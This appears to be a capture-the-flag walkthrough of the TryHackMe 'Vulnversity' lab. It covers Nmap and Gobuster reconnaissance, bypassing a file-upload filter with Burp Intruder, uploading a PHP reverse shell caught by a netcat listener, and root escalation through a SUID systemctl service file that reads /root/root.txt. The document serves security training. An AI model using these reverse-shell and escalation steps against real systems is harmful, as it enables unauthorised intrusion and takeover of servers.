Vulnversity

Learn about active recon, web app attacks and privilege escalation.

Try this exercise in TryHackMe: Vulnversity

Reconnaissance

Scan the box

Nmap is a free, open-source and powerful tool used to discover hosts and services on a computer network. In our example, we use Nmap to scan this machine to identify all services running on a particular port. Nmap has many capabilities; a table summarises some of its functionality below.

nmap -sV 10.10.X.X

Locating directories using Gobuster

Now let's run Gobuster with a wordlist using:

gobuster dir -u http://10.10.X.X:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

Compromise the Webserver

Now that you have found a form to upload files, we can leverage this to upload and execute our payload, which will lead to compromising the web server. We will fuzz the upload form to identify which extensions are not blocked.

Using BurpSuite

Now, make sure BurpSuite is configured to intercept all your browser traffic. Upload a file; once this request is captured, send it to the Intruder (used for automating customised attacks).

To begin, make a wordlist with the following extensions:

  • .php

  • .php3

  • .php4

  • .php5

  • .phtml

Upload this file (phpext.txt) to the Payloads tab.

Select the Sniper attack type.

Find the filename and Add § to the extension. It should look like this:

Then click Start Attack

*Doing this attack in Intruder would ideally let us know which extensions are permitted or not. But in this case, we see no vast difference in the response received, length, and status codes.

By just brute-forcing, we identified that the .phtml extension is allowed the upload form

Getting a Reverse Shell

We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you'll listen for incoming connections, upload and execute your shell, which will beacon out to you to control! You can download the following reverse PHP shell here.

To gain remote access to this machine, follow these steps:

  1. Edit the php-reverse-shell.php file and edit the ip to be your tun0 of your AttackBox

  2. Rename this file to reverse-shell.phtml.

  1. We're now going to listen to incoming connections using netcat. Run the following command: nc -lvnp 1234.

  1. Upload your shell and navigate to http://10.10.X.X:3333/internal/uploads/reverse-shell.phtml This will execute your payload.

You should see a connection on your Netcat session.

Check the files in the machine.

We now get the contents of user.txt

Privilege Escalation

Now that you have compromised this machine, we will escalate our privileges and become the superuser (root).

In Linux, SUID (set owner userId upon execution) is a particular type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, you will need to write to the shadowers file that you do not have access to; root does, so it has root privileges to make the right changes.

find / -perm -u=s -type f 2>/dev/null

The /bin/systemctl stands out and unusually big

From GTFObins, we search for systemctl sudo privilege escalation steps.

We’ll use (b) to specify the file that we want to open.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

We cannot use sudo in this machine, so change to:

  • /bin/systemctl link $TF

  • /bin/systemctl enable --now $TF

We get the flag in /tmp/output

PreviousKenobi

Last updated